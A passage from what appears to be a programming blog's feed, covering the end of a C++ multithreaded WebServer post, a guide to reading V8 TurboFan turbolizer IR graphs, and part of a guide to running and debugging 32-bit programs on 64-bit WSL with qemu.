&quot;</span> &lt;&lt; endl;</span><br><span class="line">                <span class="comment">// Close the descriptor before bailing out so it is not leaked</span></span><br><span class="line">                <span class="built_in">close</span>(file_fd);</span><br><span class="line">                <span class="built_in">handleError</span>(<span class="string">&quot;500&quot;</span>, <span class="string">&quot;Internal Server Error&quot;</span>);</span><br><span class="line">                <span class="keyword">continue</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// Read the file, using mmap for fast access</span></span><br><span class="line">            <span class="type">void</span>* addr = <span class="built_in">mmap</span>(<span class="literal">nullptr</span>, st.st_size, PROT_READ, MAP_PRIVATE, file_fd, <span class="number">0</span>);</span><br><span class="line">            <span class="comment">// Remember to close the file descriptor</span></span><br><span class="line">            <span class="built_in">close</span>(file_fd); </span><br><span class="line">            <span class="comment">// Error handling</span></span><br><span class="line">            <span class="keyword">if</span>(addr == MAP_FAILED)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Can not map file [&quot;</span> &lt;&lt; path_ &lt;&lt; <span class="string">&quot;] -&gt; mem ! 
&quot;</span> &lt;&lt; endl;</span><br><span class="line">                <span class="built_in">handleError</span>(<span class="string">&quot;500&quot;</span>, <span class="string">&quot;Internal Server Error&quot;</span>);</span><br><span class="line">                <span class="keyword">continue</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// Copy the data from the mapped pages into responseBody</span></span><br><span class="line">            <span class="type">char</span>* file_data_ptr = <span class="built_in">static_cast</span>&lt;<span class="type">char</span>*&gt;(addr);</span><br><span class="line">            <span class="function">string <span class="title">responseBody</span><span class="params">(file_data_ptr, file_data_ptr + st.st_size)</span></span>;</span><br><span class="line">            <span class="comment">// Remember to unmap the memory</span></span><br><span class="line">            <span class="type">int</span> res = <span class="built_in">munmap</span>(addr, st.st_size);</span><br><span class="line">            <span class="keyword">if</span>(res == <span class="number">-1</span>)</span><br><span class="line">                <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Can not unmap file [&quot;</span> &lt;&lt; path_ &lt;&lt; <span class="string">&quot;] &lt;-&gt; mem ! 
&quot;</span> &lt;&lt; endl;</span><br><span class="line">            <span class="comment">// Determine the Content-type</span></span><br><span class="line">            string suffix = path_;</span><br><span class="line">            <span class="comment">// Loop to find the last dot</span></span><br><span class="line">            <span class="type">size_t</span> dot_pos;</span><br><span class="line">            <span class="keyword">while</span>((dot_pos = suffix.<span class="built_in">find</span>(<span class="string">&#x27;.&#x27;</span>)) != string::npos)</span><br><span class="line">                suffix = suffix.<span class="built_in">substr</span>(dot_pos + <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// Send the data</span></span><br><span class="line">            <span class="keyword">if</span>(<span class="built_in">sendResponse</span>(<span class="string">&quot;200&quot;</span>, <span class="string">&quot;OK&quot;</span>, MimeType::<span class="built_in">getMineType</span>(suffix), responseBody) != ERR_SUCCESS)</span><br><span class="line">                <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Send Response failed !&quot;</span> &lt;&lt; endl;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;------------------ Connection Closed ------------------&quot;</span> &lt;&lt; endl;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="六、编译-调试">VI. Building &amp; Debugging</h2><p>Finally, a few words on building and debugging. Running <code>make</code> builds a WebServer binary with debug information. The makefile is copied directly from <a href="https://github.com/linyacool/WebServer/blob/master/old_version/old_version_0.1/Makefile">the makefile in linyacool/WebServer</a>, with the optimization level changed to <code>-O0</code> and extra debug information enabled via <code>-g3 -ggdb3</code>.</p><p>The debug information produced by <code>-g</code> can be shared by multiple debuggers, whereas the debug information produced by <code>-ggdb</code> is intended specifically for gdb; the two are not exactly equivalent. At debug level 3, as in <code>-ggdb3</code>, even <strong>macros</strong> can be debugged.</p><p>Debugging here is done mainly with <strong>gdb + pwndbg</strong> (gdb forever). Multithreaded programs are very convenient to debug under gdb: it can quickly switch thread context (with <code>thread &lt;threadNum&gt;</code>) and stack-frame context (with <code>f &lt;frameNum&gt;</code>), and it is just as easy to inspect <code>errno</code> on the fly or to call <code>strerror(errno)</code> to see the error message.</p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;概述&quot;&gt;Overview&lt;/h2&gt;
&lt;p&gt;WebServer 1.0 is a simple implementation of a basic &lt;strong&gt;concurrent network server&lt;/strong&gt;. This version mainly implements the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Wrappers for thread mutexes &amp;amp; condition variables&lt;/li&gt;
&lt;li&gt;A thread pool design to support concurrency&lt;/li&gt;
&lt;li&gt;A basic network connection implementation&lt;/li&gt;
&lt;li&gt;Basic support for the HTTP protocol
&lt;ul&gt;
&lt;li&gt;Support for some common HTTP response messages
&lt;ul&gt;
&lt;li&gt;200 OK&lt;/li&gt;
&lt;li&gt;400 Bad Request&lt;/li&gt;
&lt;li&gt;500 Internal Server Error&lt;/li&gt;
&lt;li&gt;501 Not Implemented&lt;/li&gt;
&lt;li&gt;505 HTTP Version Not Supported&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Support for HTTP GET requests&lt;/li&gt;
&lt;li&gt;Support for the HTTP/1.1 &lt;strong&gt;persistent connection&lt;/strong&gt; feature&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The project code for version 1.0 is at &lt;a href=&quot;https://github.com/Kiprey/WebServer/tree/4095ccc6fd3facd3988ea71178cacad7b4e0dd13&quot;&gt;Kiprey/WebServer CommitID: 4095cc - github&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The latest project code is at &lt;a href=&quot;https://github.com/Kiprey/WebServer&quot;&gt;Kiprey/WebServer - github&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="Project" scheme="https://kiprey.github.io/categories/Project/"/>
    
    <category term="WebServer" scheme="https://kiprey.github.io/categories/Project/WebServer/"/>
    
    
    <category term="WebServer" scheme="https://kiprey.github.io/tags/WebServer/"/>
    
  </entry>
  
  <entry>
    <title>A Brief Analysis of V8 TurboFan Generated Graphs</title>
    <link href="https://kiprey.github.io/2021/04/v8TurboFan_IR_intro/"/>
    <id>https://kiprey.github.io/2021/04/v8TurboFan_IR_intro/</id>
    <published>2021-04-29T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.208Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>V8's turbolizer helps us analyze how the TurboFan JIT optimizes code and what its optimization process looks like. However, we often only half understand the IR graphs that turbolizer produces and are unsure what the individual symbols mean. The following are notes I took after reading the relevant code.</p><span id="more"></span><h2 id="二、TurboFan-Json-格式">II. TurboFan JSON Format</h2><ul><li><p>The <code>--trace-turbo</code> flag generates data in JSON format. Loading this JSON into turbolizer produces an IR graph like this:<br><img src="/2021/04/v8TurboFan_IR_intro/image-20210429213824538.png" alt="img"></p></li><li><p>The format of this JSON is as follows:</p><figure class="highlight json"><table><tr><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span 
class="attr">&quot;function&quot;</span><span class="punctuation">:</span> <span class="string">&quot;opt_me&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;sourcePosition&quot;</span><span class="punctuation">:</span> <span class="number">109</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;source&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span>js source<span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;phases&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">        <span class="punctuation">&#123;</span></span><br><span class="line">            <span class="attr">&quot;name&quot;</span><span class="punctuation">:</span> <span class="string">&quot;Typed&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;graph&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;data&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">                <span class="attr">&quot;nodes&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">                    <span class="punctuation">[</span>...<span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">                    <span class="punctuation">&#123;</span></span><br><span class="line">                        <span class="attr">&quot;id&quot;</span><span class="punctuation">:</span> <span class="number">20</span><span class="punctuation">,</span></span><br><span class="line">                        <span 
class="attr">&quot;label&quot;</span><span class="punctuation">:</span> <span class="string">&quot;FrameState[INTERPRETED_FRAME, 11, Ignore, 0x1a5acd4aa5e9 &lt;SharedFunctionInfo opt_me&gt;]&quot;</span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;title&quot;</span><span class="punctuation">:</span> <span class="string">&quot;FrameState[INTERPRETED_FRAME, 11, Ignore, 0x1a5acd4aa5e9 &lt;SharedFunctionInfo opt_me&gt;]&quot;</span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;live&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;properties&quot;</span><span class="punctuation">:</span> <span class="string">&quot;Idempotent, NoRead, NoWrite, NoThrow, NoDeopt&quot;</span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;pos&quot;</span><span class="punctuation">:</span> <span class="number">178</span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;opcode&quot;</span><span class="punctuation">:</span> <span class="string">&quot;FrameState&quot;</span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;control&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;opinfo&quot;</span><span class="punctuation">:</span> <span class="string">&quot;5 v 0 eff 0 ctrl in, 1 v 0 eff 0 ctrl out&quot;</span><span class="punctuation">,</span></span><br><span class="line">                        <span 
class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;Internal&quot;</span></span><br><span class="line">                    <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">                    <span class="punctuation">[</span>...<span class="punctuation">]</span></span><br><span class="line">                <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">                <span class="attr">&quot;edges&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">                    <span class="punctuation">&#123;</span></span><br><span class="line">                        <span class="attr">&quot;source&quot;</span><span class="punctuation">:</span> <span class="number">100</span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;target&quot;</span><span class="punctuation">:</span> <span class="number">101</span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;index&quot;</span><span class="punctuation">:</span> <span class="number">0</span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;control&quot;</span></span><br><span class="line">                    <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">                    <span class="punctuation">[</span>...<span class="punctuation">]</span></span><br><span class="line">                <span class="punctuation">]</span></span><br><span class="line">            <span class="punctuation">&#125;</span></span><br><span class="line">        <span class="punctuation">&#125;</span><span 
class="punctuation">,</span></span><br><span class="line">        <span class="punctuation">[</span>...<span class="punctuation">]</span></span><br><span class="line">    <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;nodePositions&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">        <span class="punctuation">[</span>...<span class="punctuation">]</span></span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>In short, the fields are:</p><ul><li>function: the function name</li><li>sourcePosition: the start position of the code</li><li>source: the JS code that TurboFan is currently optimizing</li><li>phases: the individual TurboFan optimization phases<ul><li>Phase 1<ul><li>name: the name of the phase</li><li>type: how the phase is displayed, either as a <code>graph</code> (an IR graph) or as text</li><li>data: the node and edge data actually stored for the phase<ul><li>nodes: node data<ul><li><p>Node 1</p><ul><li><p>id: the node ID, usually a number</p></li><li><p>label: the node label</p></li><li><p>title: the node title</p></li><li><p>live: whether the node is live, true / false</p></li><li><p>properties: the properties of the node</p></li><li><p>pos: not covered here</p></li><li><p>opcode: the node's opcode, e.g. <code>End</code></p></li><li><p>control: whether the node is a control node, true / false</p></li><li><p>opinfo: detailed node information, normally the node's <strong>ValueInputCount, EffectInputCount, ControlInputCount, ValueOutputCount, EffectOutputCount, and ControlOutputCount</strong>.</p><blockquote><p>The format is:</p><p>“&lt;ValueInputCount&gt;     v<br>&lt;EffectInputCount&gt;    eff<br>&lt;ControlInputCount&gt;   ctrl in,<br>&lt;ValueOutputCount&gt;    v<br>&lt;EffectOutputCount&gt;   eff<br>&lt;ControlOutputCount&gt;  ctrl out”</p><p>For example: “0 v 1 eff 1 ctrl in, 0 v 1 eff 0 ctrl out”</p></blockquote></li></ul></li><li><p>[other nodes]</p></li></ul></li><li>edges: edge data<ul><li>Edge 1<ul><li>source: the ID of the edge's source node</li><li>target: the ID of the edge's target node</li><li>index: which input of the target node the edge connects to</li><li>type: the type of the edge, e.g.
control, value, effect, and so on</li></ul></li><li>[other edges]</li></ul></li></ul></li></ul></li><li>[other phases]</li></ul></li><li>nodePositions: the position in the JS source that each node corresponds to</li></ul></li></ul><h2 id="三、Node">3. Node</h2><h3 id="a-属性说明">a. Properties</h3><p>Here is an excerpted example of a node:</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;id&quot;</span><span class="punctuation">:</span> <span class="number">128</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;label&quot;</span><span class="punctuation">:</span> <span class="string">&quot;LoadField[+16]&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;title&quot;</span><span class="punctuation">:</span> <span class="string">&quot;LoadField[tagged base, 16, Internal, kRepTaggedPointer|kTypeAny, PointerWriteBarrier]&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;live&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;properties&quot;</span><span class="punctuation">:</span> <span class="string">&quot;NoWrite, NoThrow, NoDeopt&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;pos&quot;</span><span class="punctuation">:</span> <span class="number">388</span><span 
class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;opcode&quot;</span><span class="punctuation">:</span> <span class="string">&quot;LoadField&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;control&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;opinfo&quot;</span><span class="punctuation">:</span> <span class="string">&quot;1 v 1 eff 1 ctrl in, 1 v 1 eff 0 ctrl out&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;Internal&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>The corresponding node looks like this:</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210429223708339.png" alt="img"></p><p>Comparing the two field by field shows that id, label, title, properties, opinfo, and type all appear in the graph.</p><p>The live, pos, opcode, and control fields, on the other hand, are consumed by turbolizer.js.</p><blockquote><p>Note the “Inplace update in phase: Typed” in the figure above: the phase shown there is derived dynamically by turbolizer.js and is not recorded in the JSON.</p></blockquote><h3 id="b-颜色">b. 
Colors</h3><p>You may notice that the nodes in the IR graph are colored, and that the colors seem to follow a pattern.</p><p>Judging from turbolizer.js and the CSS of the online turbolizer, turbolizer sorts nodes into the following kinds and gives each kind its own color:</p><ul><li><p>Control nodes: nodes whose control field in the JSON data is true. They are <strong>yellow</strong>.</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210430000215129.png" alt="img"></p></li><li><p>Input nodes: nodes whose opcode is Parameter or Constant. They are <strong>light blue</strong>.</p><p><strong><img src="/2021/04/v8TurboFan_IR_intro/image-20210430000451537.png" alt="img"></strong></p></li><li><p>Live nodes (<strong>not really a separate kind</strong>): nodes whose live field is true. Their opposite, dead nodes, are drawn in a lightened version of their original color, as in the picture below. The two nodes shown are of the same kind; the one on the left is dead and the one on the right is live.</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210430001053708.png" alt="img"></p></li><li><p>JavaScript nodes: nodes whose opcode starts with <strong>JS</strong>. They are <strong>orange-red</strong>.</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210430001231982.png" alt="img"></p></li><li><p>Simplified nodes: nodes whose opcode contains <strong>Phi, Boolean, Number, String, Change, Object, Reference, Any, ToNumber, AnyToBoolean, Load, or Store</strong>, but which are <strong>not JavaScript nodes</strong>. Their color is shown below:</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210430001623787.png" alt="img"></p></li><li><p>Machine nodes: all remaining nodes, i.e. those that belong to none of the four kinds above. Their color is shown below:</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210430001755202.png" alt="img"></p></li></ul><h2 id="四、Edge">4. Edge</h2><p>An edge's Type takes one of five values, <strong>value</strong>, <strong>context</strong>, <strong>frame-state</strong>, <strong>effect</strong>, and <strong>control</strong>, plus a final fallback, unknown.</p><p>Below are examples of each:</p><h3 id="a-value-边">a. 
value edges</h3><p>Take this edge:</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;source&quot;</span><span class="punctuation">:</span> <span class="number">80</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;target&quot;</span><span class="punctuation">:</span> <span class="number">83</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;index&quot;</span><span class="punctuation">:</span> <span class="number">4</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;value&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>It is rendered as follows:</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210429230418329.png" alt="img"></p><p>As you can see, a <strong>value edge</strong> is drawn as a <strong>solid line</strong>.</p><h3 id="b-context-边">b. 
context edges</h3><p>Take this edge:</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;source&quot;</span><span class="punctuation">:</span> <span class="number">4</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;target&quot;</span><span class="punctuation">:</span> <span class="number">49</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;index&quot;</span><span class="punctuation">:</span> <span class="number">3</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;context&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>It is rendered as follows:</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210429231008606.png" alt="img"></p><p>As you can see, a <strong>context edge</strong> is also a <strong>solid line</strong>. In this example, however, context edges are emitted only by the <code>Parameter[%context#4]</code> node, so they <strong>cannot be confused with value edges</strong>.</p><p>Note that context edges appear only as the outgoing edges of a context node; in other words, no node emits both context edges and value edges.</p><blockquote><p>If you know of a counterexample, please let me know.</p></blockquote><h3 id="c-frame-state-边">c. 
frame-state edges</h3><p>Example:</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;source&quot;</span><span class="punctuation">:</span> <span class="number">50</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;target&quot;</span><span class="punctuation">:</span> <span class="number">49</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;index&quot;</span><span class="punctuation">:</span> <span class="number">4</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;frame-state&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>Rendering:</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210429232323942.png" alt="img"></p><p>As you can see, a <strong>frame-state edge</strong> is drawn as a <strong>sparsely dashed line</strong>.</p><p>A frame-state edge is always emitted by a FrameState node.</p><blockquote><p>The other dashed line in the figure above is <strong>densely dashed</strong>; the two differ only in <strong>dash spacing</strong>.</p></blockquote><h3 id="d-effect-边">d. 
effect edges</h3><p>Example:</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;source&quot;</span><span class="punctuation">:</span> <span class="number">114</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;target&quot;</span><span class="punctuation">:</span> <span class="number">49</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;index&quot;</span><span class="punctuation">:</span> <span class="number">5</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;effect&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>Rendering:</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210429232831969.png" alt="img"></p><p>That is, an <strong>effect edge</strong> is drawn as a <strong>densely dashed line</strong>.</p><h3 id="e-control-边">e. 
control edges</h3><p>Example:</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;source&quot;</span><span class="punctuation">:</span> <span class="number">31</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;target&quot;</span><span class="punctuation">:</span> <span class="number">49</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;index&quot;</span><span class="punctuation">:</span> <span class="number">6</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;control&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>Rendering:</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210429233143544.png" alt="img"></p><p>Note: like a value edge, a <strong>control edge</strong> is drawn as a <strong>solid line</strong>. This means that from the IR graph alone you cannot tell control edges and value edges apart.</p><h2 id="五、参考的源码">5. Source files consulted</h2><ul><li>v8/tools/turbolizer/build/turbolizer.js</li><li>v8/src/compiler/graph-visualizer.cc</li></ul>]]></content>
    
    
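    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;1. Introduction&lt;/h2&gt;
&lt;p&gt;v8's turbolizer helps us analyze how the TurboFan JIT optimizes code and what each optimization step does. Yet the IR graphs turbolizer produces are often only half understood, because it is unclear what the individual symbols stand for. These are the notes I took after reading the relevant code.&lt;/p&gt;</summary>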
    
    
    
    
    <category term="v8" scheme="https://kiprey.github.io/tags/v8/"/>
    
  </entry>
  
  <entry>
    <title>Running 32-bit Programs on 64-bit WSL</title>
    <link href="https://kiprey.github.io/2021/04/i386_WSL64/"/>
    <id>https://kiprey.github.io/2021/04/i386_WSL64/</id>
    <published>2021-04-27T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.020Z</updated>
    
    <content type="html"><![CDATA[<p>Running 32-bit x86 programs under WSL1 is fairly difficult: it takes many steps and has limitations.</p><p>WSL2 can run x86 programs directly, but you have to upgrade to it from WSL1.</p><p>Both routes are rather tedious, so this post records some of the detours I took.</p><span id="more"></span><h2 id="1-WSL1">1. WSL1</h2><ul><li><p>Paste the following commands into WSL; once they finish, gcc / g++ <strong>can compile 32-bit programs and run them</strong>.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Enable the i386 (32-bit) architecture</span></span><br><span class="line"><span class="built_in">sudo</span> dpkg --add-architecture i386</span><br><span class="line"><span class="built_in">sudo</span> apt-get update</span><br><span class="line"></span><br><span class="line"><span class="comment"># Install qemu</span></span><br><span class="line"><span class="built_in">sudo</span> apt install qemu-user-static</span><br><span class="line"></span><br><span class="line"><span class="comment"># Register x86 ELF binaries to run under qemu</span></span><br><span class="line"><span class="built_in">sudo</span> update-binfmts --install i386 /usr/bin/qemu-i386-static --magic <span class="string">&#x27;\x7fELF\x01\x01\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00\x01\x00\x00\x00&#x27;</span> --mask <span class="string">&#x27;\xff\xff\xff\xff\xff\xff\xff\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xf8\xff\xff\xff\xff\xff\xff\xff&#x27;</span></span><br><span class="line"></span><br><span 
class="line"><span class="comment"># Start the service</span></span><br><span class="line"><span class="built_in">sudo</span> service binfmt-support start</span><br><span class="line"></span><br><span class="line"><span class="comment"># Append an alias named 32 for the start-service command to .zshrc, then reload the config</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;alias 32=&#x27;sudo service binfmt-support start&#x27;&quot;</span> &gt;&gt; ~/.zshrc</span><br><span class="line"><span class="built_in">source</span> ~/.zshrc</span><br><span class="line"></span><br><span class="line"><span class="comment"># Install some basic x86 libraries</span></span><br><span class="line"><span class="built_in">sudo</span> apt-get install g++-multilib libc6:i386 libgcc1:i386 gcc-9-base:i386 libstdc++6:i386</span><br><span class="line"><span class="built_in">sudo</span> apt autoremove</span><br></pre></td></tr></table></figure></li><li><p>However, even though 32-bit programs now compile and run, they <strong>still cannot be debugged with gdb</strong>: the 64-bit gdb cannot debug a 32-bit program here.</p><p>gdb warns that the selected architecture i386 is not compatible with the reported target architecture i386:x86-64:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">warning: Selected architecture i386 is not compatible with reported target architecture i386:x86-64</span><br><span class="line">warning: Architecture rejected target-supplied description</span><br></pre></td></tr></table></figure><p>In that case you have to compromise and use the following approach:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Start the program under qemu with a debug stub listening on port 1234</span></span><br><span 
class="line">qemu-i386-static -g 1234 &lt;process&gt;</span><br><span class="line"></span><br><span class="line"><span class="comment"># Open a new terminal and start gdb</span></span><br><span class="line">gdb</span><br><span class="line"><span class="comment"># In gdb, set the architecture to i386 (it seems to work without this too?)</span></span><br><span class="line">pwndbg&gt; <span class="built_in">set</span> architecture i386</span><br><span class="line"><span class="comment"># Connect to the local qemu port 1234</span></span><br><span class="line">pwndbg&gt; target remote 127.0.0.1:1234</span><br><span class="line"><span class="comment"># Try to load symbols</span></span><br><span class="line">pwndbg&gt; file &lt;process&gt;</span><br></pre></td></tr></table></figure><p>This approach has a limitation, though: the symbols cannot be loaded.</p><p>A more hardcore option is to download the gdb source and build it yourself, but I have not tried that yet.</p><blockquote><p>As of this writing, running and debugging 32-bit programs under 64-bit WSL is still quite difficult.</p><p>So I chose to debug 32-bit programs in a VM XD.</p></blockquote></li><li><p>References:</p><ul><li><a href="https://blog.csdn.net/qq_40827990/article/details/83216139">Linux64位子系统运行32位程序 - CSDN</a></li><li><a href="https://www.codeleading.com/article/24462195544/">Win 64位Linux子系统运行32位elf程序(简洁明了/亲测可用) - 代码先锋网</a></li></ul></li></ul><h2 id="2-WSL2">2. 
